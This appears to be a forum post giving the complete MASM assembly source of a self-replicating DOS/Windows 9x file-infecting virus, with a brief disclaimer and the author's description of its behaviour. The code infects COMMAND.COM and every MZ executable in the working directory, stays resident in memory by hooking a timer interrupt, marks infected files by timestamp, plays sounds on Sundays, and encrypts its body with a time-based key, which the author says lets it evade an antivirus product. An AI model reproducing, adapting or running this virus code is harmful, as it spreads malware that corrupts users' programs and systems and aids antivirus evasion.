文章作者:FOX-A
复制内容到剪贴板
代码:
;警 告:仅供技术交流,使用者风险自负.若有其他用途,概与本人无关.万一有转贴,请保持完整性,多谢!
;---The Virus Program Information------------------------------
;
;maker FOX-A
;finish 2000.9
;
;make a file name:fox.asm
;microsoft Assembler:masm fox
;microsoft Link:link fox
;
;Warning:This Virus code must run in win95/98/me.(make sure there is autoexec.bat
; or config.sys in c: root.The virus only infect MZ file of DOS.
;
;1)After assembler and link,run the program first time,the Virus will infect the file
; COMMAND.COM and then have some error,just at first time.
;2)Then you restart your computer again.when the system run the file COMMAND.COM
; the Virus code will keep in memory.
;3)When you run a DOS program in windows,the virus will infect all MZ file in the
; directory,and mark the file time is 5:49.27.
;4)When you start MS-DOS MODE in Windows,the virus will lock in memory.
;5)If the data is sunday and you are in windows.The virus will make some sound every
; 8 minute all the day.
;6)when Run the infected file.the file will check the COMMAND.COM had infected or not
; and infect it.make sure can infect anther computer.
;7)At first time it will found by KV3000,after my encrypt,the KV3000 can find me now.
;8)My Virus use a code smsw ax to check the system is run in Protect Mode or Real Mode.
;--------------------------------------------------------------
;some const data for program
encrypt_leng=(encrypt_until_here-encrypt_start_here)/2-1 ;is byte
virus_leng=the_end-start
code segment
assume cs:code,ds:code
start: ;MAIN PROGRAM START
;---uncoil the virus code----------
mov cx,cs:[long]
mov bx,offset encrypt_start_here
mov ax,cs:[key] ;key for uncoil
uncoil_again:
sub cs:[bx],ax
add bx,2
loop uncoil_again
;------------------------------
jmp next
long dw 1
key dw 0;for uncoil
next:
encrypt_start_here:
;----------------
;#######################################################
;MAIN START$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
call save_register ;save the working register
call get_ready ;get ready to run vrius
call work_out_cs_ss ;work out cs and ss
call infect_system ;infect system
call install_virus ;install virus in memory
call restore_register ;restore the working register
call jump_to_exe ;jump to Host
;MAIN END$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
;#######################################################
jump_to_exe proc near
cli ;restore ss:sp
mov ss,cs:exe_ss_in_RAM
mov sp,cs:exe_sp_in_RAM
sti
jmp cs:exe_entry_point_in_RAM ;--->>> Host
;NEW DATA---------------
exe_entry_point_in_RAM label dword
exe_ip_in_RAM dw ?
exe_cs_in_RAM dw ?
;-------------------------
exe_sp_in_RAM dw ?
exe_ss_in_RAM dw ?
;-------------------------
exe_cs_in_HEAD dw ?
exe_ss_in_HEAD dw ?
exe_ip_in_HEAD dw ?
exe_sp_in_HEAD dw ?
virus_cs_ss_in_HEAD dw ?
jump_to_exe endp
;######################################################
save_register proc near
pop ax ;pop ip for ret
push bp
push si
push di
push ds
push es
push ax ;push ip for ret
ret
save_register endp
;--------------------------------------------------------
restore_register proc near
pop ax ;pop ip for ret
pop es ;restore the regs
pop ds
pop di
pop si
pop bp
push ax ;push ip for ret
ret
restore_register endp
;-------------------------------------------------------
get_ready proc near
mov ax,cs ;make sure ds=cs
mov ds,ax
;-----------------------------
mov MCB,es ;no useed before.for cut memory
mov ah,34h ;get in dos area
int 21h
mov indosseg,es ;save in dos area (es:bx)
mov indosoff,bx
;-----------------------------
mov in_windows,0 ;for command.com in windows flag
mov in_virus,0 ;if in virus flag
ret
get_ready endp
;-------------------------------------------------------
work_out_cs_ss proc near ;here hard to do!!
;---------------------------------
cmp exe_cs_in_HEAD,0fff0h ;work out cs
jz is_psp_exe
mov bx,virus_cs_ss_in_HEAD
sub bx,exe_cs_in_HEAD
mov ax,cs
sub ax,bx
mov exe_cs_in_RAM,ax
jmp work_out_cs_ok
is_psp_exe:
mov bx,virus_cs_ss_in_HEAD
add bx,10h
mov ax,cs
sub ax,bx
mov exe_cs_in_RAM,ax
work_out_cs_ok:
;---------------------------------
mov bx,virus_cs_ss_in_HEAD ;work out ss
sub bx,exe_ss_in_HEAD
jb out_code
mov ax,cs
sub ax,bx
mov exe_ss_in_RAM,ax
jmp work_out_ss_ok
out_code:
mov bx,exe_ss_in_HEAD
sub bx,virus_cs_ss_in_HEAD ;work out ss
mov ax,cs
add bx,ax
mov exe_ss_in_RAM,bx
work_out_ss_ok:
;---------------------------------
mov ax,exe_ip_in_HEAD ;work out ip
mov exe_ip_in_RAM,AX
;---------------------------------
mov ax,exe_sp_in_HEAD ;work out sp
mov exe_sp_in_RAM,AX
;---------------------------------
ret
work_out_cs_ss endp
;######################################################
install_virus proc near
mov ah,35h ;get int 01ch Enter point
mov al,01ch
int 21h
mov bx,es:[bx]
cmp bx,0802eh ;virus in memory ?
jz installed ;virus had install
;-----------------------;CUT MEM BEGIN. THIS IS GOOD CODE!!!
mov ax,MCB ;cut memory
sub ax,1
mov es,ax ;es=memory block
mov bx,es:[3]
sub bx,virus_leng/16+1 ;memory size of cuted
;bx used to press memory
mov ax,MCB ;PRESS memory
mov es,ax
mov ah,04ah
int 21h
jc error_press_mem ;error
mov ax,MCB
add bx,ax ;bx: use it to press memory
mov cuted_mem,bx ;work out cuted memory area segment
mov cx,virus_leng ;move virus to cutmem
mov si,0
mov di,0
mov es,cuted_mem
cld
rep movsb ;move Virus code to cuted memory
mov ax,MCB ;set this block is the last (05ah) one
sub ax,1
mov es,ax
mov es:[0],byte ptr 05ah ;brockren to memory block. new for cut memory
;------------------------CUT MEM END.
mov ds,cs:cuted_mem ;ds change install int 1ch
mov dx,offset BOOT_virus
mov al,01ch
mov ah,25h
int 21h
mov ax,cs ;restore ds
mov ds,ax
installed:
error_press_mem:
ret
;DATA----------------------------
cuted_mem dw ?
MCB dw ?
install_virus endp
;######################################################
infect_system proc near
call find_sys_path_file ;find the sys_file path
mov ah,02fh ;get DTA area
int 21h
mov oldDTAseg,es ;save DTA
mov oldDTAoff,bx
mov ah,01ah ;set DTA
mov dx,offset DTA
int 21h
;------------------------
mov ah,04eh ;find file *.exe
mov dx,offset sys_file
mov cx,0
int 21h
jc infect_sys_fail
;-------------------------
mov bx,offset sys_file ;move sys_file to filename
mov si,offset filename
mov cx,30
loop_move:
mov ah,[bx]
mov [si],ah
add bx,1
add si,1
loop loop_move ;loop move
call infect_exe ;infect *.exe
infect_sys_fail:
;-------------------------
mov ah,01ah ;restore DTA
mov dx,oldDTAoff
mov ds,oldDTAseg
int 21h
mov ax,cs ;restore DS
mov ds,ax
infect_sys_exit:
ret
infect_system endp
;###############################################
find_sys_path_file proc near
mov ah,62h ;get psp seg area
int 21h
mov es,bx
mov bx,es:[02ch]
mov es,bx ;es:0 is comspec='c:\.....'
mov ah,'=' ;finded flag
mov al,'C'
mov bx,0 ;es:bx begin point
mov cx,08000h ;32kb
find_1: cmp es:[bx],ax ;find the point of the path start
jz finded ;find it
add bx,1
loop find_1
jmp no_find ;no find
finded:
;----------------------------
add bx,2 ;move the path to sys_file
mov dx,0
mov cx,30
mov si,offset sys_file
move_1:
mov ah,byte ptr es:[bx]
mov [si],ah
add si,1
add bx,1
add dx,1
cmp ah,0
jz move_end
loop move_1 ;loop move
move_end:
no_find:
ret
;DATA----------------------------
sys_file db 30 dup(0)
find_sys_path_file endp
;######################################################
;&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
;&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
BOOT_virus proc far
cmp cs:in_virus,0 ;if in virus?
jz help_jump_1
jmp exit_boot_virus ;is in virus
help_jump_1:
mov byte ptr cs:in_virus,1 ;set now is in virus
cli
push di ;save working regs
push si
push ax
push bx
push cx
push dx
push ds
push es
mov ax,cs ;make sure ds=cs
mov ds,ax
mov es,indosseg
mov bx,indosoff
cmp byte ptr es:[bx],0
jnz dos_busying ;sys is busying?
cmp in_windows,1
jz virus_can_out ;after in windows
db 0fh,01,0e0h ;smsw ax
and ax,111b ;ax=011h or ax=101h
cmp ax,11b
jl no_in_windows ;< no in windows
mov in_windows,1 ;in windows now
no_in_windows:
jmp exit_virus ;no windows exit boot virus
virus_can_out:
db 0fh,01,0e0h ;smsw ax
and ax,111b ;ax=011h or ax=101h
cmp ax,11b
jl sound_exit ;no in windows
;-------------------------------------
mov ah,02ah ;get week
int 21h
cmp al,0
jnz no_sound ;no sunday
mov ah,02ch ;get time
int 21h
and cl,0111b
jnz no_sound ;no sound
in al,61h
or al,011b ;sound
out 61h,al
jmp sound_exit
no_sound:
in al,61h
and al,011111100b ;no sound
out 61h,al
sound_exit:
;-------------------------------------
db 0fh,01,0e0h ;smsw ax
and ax,111b ;ax=011h ;ax=101h
cmp ax,1b
jnz exit_virus
call find_and_infect ;infect file
exit_virus:
dos_busying:
pop es ;restore regs
pop ds
pop dx
pop cx
pop bx
pop ax
pop si
pop di
sti
mov byte ptr cs:in_virus,0 ;set now out virus
exit_boot_virus:
iret
;DATA----------------------------
in_virus db 0
indosseg dw ?
indosoff dw ?
in_windows db 0
BOOT_virus endp
;&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
;&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
;######################################################
find_and_infect proc near
mov ah,19h ;get driver
int 21h
cmp al,0 ;is in A:
jz find_exit ;no find and infect
mov ah,02fh ;get DTA area
int 21h
mov oldDTAseg,es ;save DTA
mov oldDTAoff,bx
mov ah,01ah ;set DTA
mov dx,offset DTA
int 21h
;------------------------
mov ah,04eh ;find file *.exe
mov dx,offset find_file_exe
int 21h
jc find_end_exe
find_one_exe:
call infect_exe ;infect a finded file
mov ah,04fh
int 21h ;find next
jnc find_one_exe ;next find finded
find_end_exe:
;-------------------------
mov ah,01ah ;restore DTA
mov dx,oldDTAoff
mov ds,oldDTAseg
int 21h
mov ax,cs ;restore DS
mov ds,ax
find_exit:
ret
;DATA----------------------------
find_file_exe db '*.exe',0
oldDTAseg dw ?
oldDTAoff dw ?
find_and_infect endp
;######################################################
infect_exe proc near
cmp filetime,02e3bh ;if the time is 5:49.27
jnz help_exe_3
jmp error_exe ;on infect
help_exe_3:
mov ah,43h ;set file attrib is 20 can change
mov al,1
mov dx,offset filename
mov cx,20h
int 21h
mov ah,03dh ;open file
mov al,2 ;for read and write
mov dx,offset filename
int 21h
jnc help_exe_1
jmp error_exe ;open file error
help_exe_1:
mov hand_exe,ax
mov ah,03fh ;read file to buff_data(exe_head)
mov dx,offset exe_head
mov bx,hand_exe
mov cx,01ch
int 21h
jnc help_exe_2
jmp error_exe ;error
help_exe_2:
;the data of *.exe head had read to buff_data
mov bx,offset exe_head ;for after must change cs,ip,x*512,xx
;-----------------------------------------
mov ax,[bx+10h] ;save sp
mov exe_sp_in_HEAD,ax
;-----------------------------------------
mov [bx+10h],word ptr 0ffffh ;change sp=ffffh
;----------------------------------------
mov ax,[bx+14h] ;save ip
mov exe_ip_in_HEAD,ax
;----------------------------------------
mov [bx+14h],word ptr 0 ;change ip=0000
;----------------------------------------
mov ax,[bx+16h]
mov exe_cs_in_HEAD,ax ;save cs
;----------------------------------------
mov ax,[bx+0eh]
mov exe_ss_in_HEAD,ax ;save ss
;----------------------------------------
mov dx,filesize+2
mov ax,filesize
add ax,200h
adc dx,0
mov cx,200h ;(dx,ax)/(scr)->ax..->dx(yu)
div cx ;/
mov [bx+4],ax ;save to head ;*512
mul cx ;*
mov filesize+2,dx ;save new file size
mov filesize,ax
mov cx,10h
div cx
sub ax,[bx+8h] ;(all long seg)-(hand seg)
mov virus_cs_ss_in_HEAD,ax
;----------------------------------
mov [bx+16h],ax ;new cs
mov [bx+0eh],ax ;new ss
;----------------------------------
mov ax,[bx+4]
add ax,3 ;(*512)=(*512)+3
mov [bx+4],ax ;put in memory size
mov [bx+2],word ptr 0 ;(<512)=0
;----------------------------------
mov ax,[bx]
cmp ax,05a4dh ;is exe file ?
jz help_88
jmp error_exe ;no exe file
help_88:
mov cx,filesize+2 ;move point to the end
mov dx,filesize
mov ah,42h
mov al,0
mov bx,hand_exe
int 21h
;'''''''''''''''''''
mov ah,02ch;read the time to the key for encrypt.
int 21h
mov [key],dx
mov cx,encrypt_leng
mov [long],cx
mov ah,40h ;write the virus to the file end
mov dx,0
mov bx,hand_exe
mov cx,offset encrypt_start_here ;virus size
int 21h
mov si,offset encrypt_start_here
mov cx,virus_leng/16+1
write_again:
push cx
mov cx,8
mov bx,offset data_buff
move_again_2:
mov ax,[si]
mov [bx],ax
add si,2
add bx,2
loop move_again_2
mov cx,8
mov bx,offset data_buff
mov ax,[key]
add_again:
add [bx],ax;encrypt with time key
add bx,2
loop add_again
mov ah,40h ;write the virus to the file end
mov dx,offset data_buff
mov bx,hand_exe
mov cx,16 ;virus size
int 21h
pop cx
loop write_again
mov ah,42h ;move file point to head
mov al,0
mov cx,0
mov dx,0
mov bx,hand_exe
int 21h
mov ah,40h ;write the buff_data to file head
mov dx,offset exe_head
mov bx,hand_exe
mov cx,01ch
int 21h
close_file:
mov ah,57h ;set file time is 5:49.27.mark
mov al,1
mov bx,hand_exe
mov cx,02e3bh ;time
int 21h
mov ah,03eh ;close file
mov bx,hand_exe
int 21h
mov ah,68h ;hand up the file=close
mov bx,hand_exe
int 21h
mov ah,43h ;back change attrib
mov al,1
mov dx,offset filename
mov ch,0
mov cl,fileattr
int 21h
error_exe:
ret
;DATA----------------------------
hand_exe dw ?
exe_head db 01ch dup (0)
infect_exe endp
;######################################################
; DTA DTA DTA
;######################################################
DTA label byte
db 21 dup(?)
fileattr db ?
filetime dw ? ;file time
filedate dw ?
filesize dw ?
dw ?
filename db 30 dup(0) ;file name
db 0ch dup (0)
;######################################################
;######################################################
;----------------
encrypt_until_here:
dw ?
data_buff db 16 dup(?)
the_end:
code ends
end start
